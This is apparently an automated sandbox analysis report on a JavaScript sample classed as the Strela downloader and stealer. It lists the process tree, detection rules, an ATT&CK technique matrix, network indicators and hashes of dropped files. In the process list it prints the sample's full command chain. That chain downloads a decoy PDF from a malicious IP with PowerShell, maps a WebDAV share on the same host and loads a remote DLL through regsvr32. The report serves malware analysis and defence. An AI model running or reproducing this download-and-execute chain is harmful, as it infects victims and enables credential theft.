Windows
Analysis Report
2272523722022218526.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7504 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
- Acrobat.exe (PID: 7784 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 8004 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 8184 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1748,i,16883510271714916648,17976950393990085260,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Section loaded: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | unknown | ||
false | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588854 |
Start date and time: | 2025-01-11 06:18:53 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2272523722022218526.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 162.159.61.3, 172.64.41.3, 2.23.242.162, 217.20.57.21, 2.16.168.107, 2.16.168.105, 23.209.209.135, 23.200.0.33, 23.200.0.21, 192.168.2.7, 13.107.246.45, 52.149.20.212, 23.41.168.139
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
00:19:53 | API Interceptor | |
00:19:57 | API Interceptor | |
00:19:57 | API Interceptor | |
02:10:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
| | Get hash | malicious | Strela Downloader | Browse | |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7067038688987752 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq0:2JIB/wUKUKQncEmYRTwh0Y |
MD5: | 74D7C98910A311641D005C7AD7FBF32E |
SHA1: | 76D6798978A21BE5461001DDDC24959BB647A335 |
SHA-256: | 4776C7ED4ABC6125DEB0FB177C0E24CACDA9885E157D615E3832A22345EA4A13 |
SHA-512: | 06D85B76D9A8F4C7F2D51E410471A0D3C604739289F86426924A2145589F7B87C5EE13AF92502DF0D8F624A7B5B3A330D0CEB290B2423505026713173A817A92 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899981699072612 |
Encrypted: | false |
SSDEEP: | 1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii |
MD5: | 210E1A5F9E68B8EE4B1D18C6360A6FA2 |
SHA1: | 4B2E317B174EDADACBC995B054028D7D84153FAA |
SHA-256: | 059AE447B3365F7AB75DA7F25045730A788EDFF65E92A6B8AAA585CCF244ABBA |
SHA-512: | A7EE1625C12BEAF408198F2F2F0300D280E20B1DC901437890006A9F405B43DA039B0F36A5F190EE6D57F5A967EFD3CB282392390A6BB86F383EB742B55849C5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08207059579331169 |
Encrypted: | false |
SSDEEP: | 3:lYerHrFRyAt/57Dek3JvaFlqllEqW3l/TjzzQ/t:lzrHrFFR3tCFQmd8/ |
MD5: | 988BC999EA267B0FB555AE31B7E54446 |
SHA1: | D22ADA5F5931BE74710D88FB31E787D3905BB55F |
SHA-256: | 672475FF9BA3F1F93BB783E000CCA03B5D5D7D220BACB7688DC8E0B02BEF2166 |
SHA-512: | B1D611D1A8D770AE6398F73B51EAB6C4F9AEC7CE4BFB0CE3987650FF01C39A8C91B4365AB29CCE3CE354BC3B1BF8271B8A2BD72F9381B598291C3945DF06F68A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.235341672228195 |
Encrypted: | false |
SSDEEP: | 6:iOoVq2PcNwi2nKuAl9OmbnIFUtdgZmwrIkwOcNwi2nKuAl9OmbjLJ:7oVvLZHAahFUtdg/rI54ZHAaSJ |
MD5: | B6A24B5ABCFE85A631005444AF4CF334 |
SHA1: | 7BCC430A9B7FB1AFFD83CE94B6622ABCB432FE78 |
SHA-256: | FE86813D7C4396AF3536A18F9CC03D35CA4D613206A881498AD9318CFCBAF9D3 |
SHA-512: | C88A3FF028F5EAF4031DCEADC7BD6F116482A769D3EBBFC33E56A7CC8E33A5A655A31C531FC851A6C38FC5C7335751F5F2A44D8B9EFC41963DCF859628B80118 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.235341672228195 |
Encrypted: | false |
SSDEEP: | 6:iOoVq2PcNwi2nKuAl9OmbnIFUtdgZmwrIkwOcNwi2nKuAl9OmbjLJ:7oVvLZHAahFUtdg/rI54ZHAaSJ |
MD5: | B6A24B5ABCFE85A631005444AF4CF334 |
SHA1: | 7BCC430A9B7FB1AFFD83CE94B6622ABCB432FE78 |
SHA-256: | FE86813D7C4396AF3536A18F9CC03D35CA4D613206A881498AD9318CFCBAF9D3 |
SHA-512: | C88A3FF028F5EAF4031DCEADC7BD6F116482A769D3EBBFC33E56A7CC8E33A5A655A31C531FC851A6C38FC5C7335751F5F2A44D8B9EFC41963DCF859628B80118 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 341 |
Entropy (8bit): | 5.243522046970095 |
Encrypted: | false |
SSDEEP: | 6:iO83+q2PcNwi2nKuAl9Ombzo2jMGIFUtgZmwGCVkwOcNwi2nKuAl9Ombzo2jMmLJ:78OvLZHAa8uFUtg/G654ZHAa8RJ |
MD5: | 0D1D79196CE2F7A77B7603F1DC5D6138 |
SHA1: | 390F36DB5C8C17D40E1A354233613D886518DDD5 |
SHA-256: | FB59451BD68B3C7C88899511430E564648C59DA026B1DB790765E298FA33C191 |
SHA-512: | 947F53BA6411056E6DE005D4AAAC921070CA1C9C803F6F851D07F4EC87981548335C8C1C5F1593F04582E74DF46B7C568596ABE2063BEA2964D92546885EBA81 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 341 |
Entropy (8bit): | 5.243522046970095 |
Encrypted: | false |
SSDEEP: | 6:iO83+q2PcNwi2nKuAl9Ombzo2jMGIFUtgZmwGCVkwOcNwi2nKuAl9Ombzo2jMmLJ:78OvLZHAa8uFUtg/G654ZHAa8RJ |
MD5: | 0D1D79196CE2F7A77B7603F1DC5D6138 |
SHA1: | 390F36DB5C8C17D40E1A354233613D886518DDD5 |
SHA-256: | FB59451BD68B3C7C88899511430E564648C59DA026B1DB790765E298FA33C191 |
SHA-512: | 947F53BA6411056E6DE005D4AAAC921070CA1C9C803F6F851D07F4EC87981548335C8C1C5F1593F04582E74DF46B7C568596ABE2063BEA2964D92546885EBA81 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\54a1292a-da1c-4269-a93f-9057d85cabc6.tmp
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.954982522033707 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqkR/EsBdOg2HUHgcaq3QYiubSpDyP7E4TX:Y2sRds//dMHeL3QYhbSpDa7n7 |
MD5: | C113088E4442513E98C946DE600144EE |
SHA1: | 8857390BC7EC8489F6989FDA3435048D24CBB0B8 |
SHA-256: | A018280A4456C1383D586D42AFFFB5139B64A6E25D6D1E7A6975247B04727B68 |
SHA-512: | ECB09BA1B910AC9979B1994415E7E3C4688263775DEFCC0714E66998FDE6A510809CF225CBBBC9C2EA7682DA441A4AB3B7F8C4C4C9A780A895A2069128C65349 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.954982522033707 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqkR/EsBdOg2HUHgcaq3QYiubSpDyP7E4TX:Y2sRds//dMHeL3QYhbSpDa7n7 |
MD5: | C113088E4442513E98C946DE600144EE |
SHA1: | 8857390BC7EC8489F6989FDA3435048D24CBB0B8 |
SHA-256: | A018280A4456C1383D586D42AFFFB5139B64A6E25D6D1E7A6975247B04727B68 |
SHA-512: | ECB09BA1B910AC9979B1994415E7E3C4688263775DEFCC0714E66998FDE6A510809CF225CBBBC9C2EA7682DA441A4AB3B7F8C4C4C9A780A895A2069128C65349 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.237560012083013 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP24fAZj:CwNw1GHqPySfkcigoO3h28ytPVfAZj |
MD5: | 97E404D56BE66413744AFED21AC22290 |
SHA1: | 5474960DEEC22AB05483E38E01BBD10E21FB72CB |
SHA-256: | 1677E32B2E16F9B31EE84CE352D0648F0075219B9853C1B5C8D6DD976E949148 |
SHA-512: | B4BE7199F6036D1A631C4C39F143502878E777EDD8F7752F9B5E392B09CEC98EB93ECC0FE142F47727B5A07F46ADC69211A4312E589D6C41B9DB6E2DE759FD89 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 329 |
Entropy (8bit): | 5.213957033637363 |
Encrypted: | false |
SSDEEP: | 6:iOC+q2PcNwi2nKuAl9OmbzNMxIFUtWFZZmwrNm3VkwOcNwi2nKuAl9OmbzNMFLJ:7TvLZHAa8jFUtCZ/rNmF54ZHAa84J |
MD5: | 8B9D9EAA08FF243D83D9A69C389E93DB |
SHA1: | A675972CA18A1FBAD622C7CB63DFED10B3227A12 |
SHA-256: | 6AB5D99771E29A3FDAD1531C9DB9E6909694946E94488E5A9A6635BF065C26AC |
SHA-512: | 01C618170CA8F0E57C04A8CC17DD8DCEFD08FB0A0AC87548A56A76A5C4CBBDF7374B33AD4A63074970E4060BBC40C3FB907167A76216B9358A92E2FBDA25FE53 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 329 |
Entropy (8bit): | 5.213957033637363 |
Encrypted: | false |
SSDEEP: | 6:iOC+q2PcNwi2nKuAl9OmbzNMxIFUtWFZZmwrNm3VkwOcNwi2nKuAl9OmbzNMFLJ:7TvLZHAa8jFUtCZ/rNmF54ZHAa84J |
MD5: | 8B9D9EAA08FF243D83D9A69C389E93DB |
SHA1: | A675972CA18A1FBAD622C7CB63DFED10B3227A12 |
SHA-256: | 6AB5D99771E29A3FDAD1531C9DB9E6909694946E94488E5A9A6635BF065C26AC |
SHA-512: | 01C618170CA8F0E57C04A8CC17DD8DCEFD08FB0A0AC87548A56A76A5C4CBBDF7374B33AD4A63074970E4060BBC40C3FB907167A76216B9358A92E2FBDA25FE53 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438447462819455 |
Encrypted: | false |
SSDEEP: | 384:SeJci5G4iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:eUurVgazUpUTTGt |
MD5: | 63E8DB6988435F69D626A4C5F874774C |
SHA1: | 0518F9FF12BB5FC3C1B4AFB8AAD59DF5731EB924 |
SHA-256: | 6A19CE7104C663C50D30700806D49F40F46C389D0BA6190539BBA9EDF8EBDE63 |
SHA-512: | 314DD1F50830AA78DDBA5EAC48592C1E24738C6F8057B88B47BF91490CE568B53CFCE395DC5E556FADFECFFFA0F41001D18D2FA885BD6F7E427A1744E145E433 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213760229914003 |
Encrypted: | false |
SSDEEP: | 24:7+ttJ6wKeqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MzZ:7MnWeqvmFTIF3XmHjBoGGR+jMz+LhD0 |
MD5: | 9B5039132F54EAC22D71B0436A308D98 |
SHA1: | 657BA18D9AB45FDE0B61181EBF418EA46601ACA0 |
SHA-256: | B3C4C2FE35FF30A3C6822232A2F00D77D10C0ACACB62A3548C54FBEC6B667DA6 |
SHA-512: | F4C8916AAF05A3E1D2CEDA615B4290EE6439FB5A4F284A39CE053638E542FC32EE78E2363C99BD8316726CDEBBAE34B5A4D0B437B8FF54DBCBD80020E24E9E0D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFklQpqbNttfllXlE/HT8kKllltNNX8RolJuRdxLlGB9lQRYwpDdt:kKJkbPeT8bdNMa8RdWBwRd |
MD5: | 3C4DA43867C85D0050D24010F3FDABB3 |
SHA1: | B0117FD6D2CC9A9737D83D4DC921EDF5C589015A |
SHA-256: | 215E337121CBF1C956CB28FE61E17AD1FD5D16C9D40084E1507DCABC491FBD2D |
SHA-512: | 4E29B6D1B5C9FEBE0A8B2EBB85AD0E3BD2AC4CBC6110FD901C2EF811845A4B7BF85D2B83C00C247348C2447E4C2CF9164BA065965D6CBAAD12B594EC19F42DAE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1391791584200512 |
Encrypted: | false |
SSDEEP: | 6:kKWnM/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:0siDnLNkPlE99SNxAhUe/3 |
MD5: | 1629230CC1F50323878D8A9F357BADFD |
SHA1: | 524C3A6720F1ABA63AF009368EBDFDDF0637EB93 |
SHA-256: | 714F56CDA9B5E3918C7E1254F08DE18499C2408FD5280C1EE8DCD15D40B5E5B0 |
SHA-512: | 4558D9A814CBCCAE155076E82A34F1041C87429BD5BE0AC4F83D7D587E6DC3FBBB8D460BEE6039C354A3E1BA54C513B67EC947430855FDB8F179FE3B12C36424 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
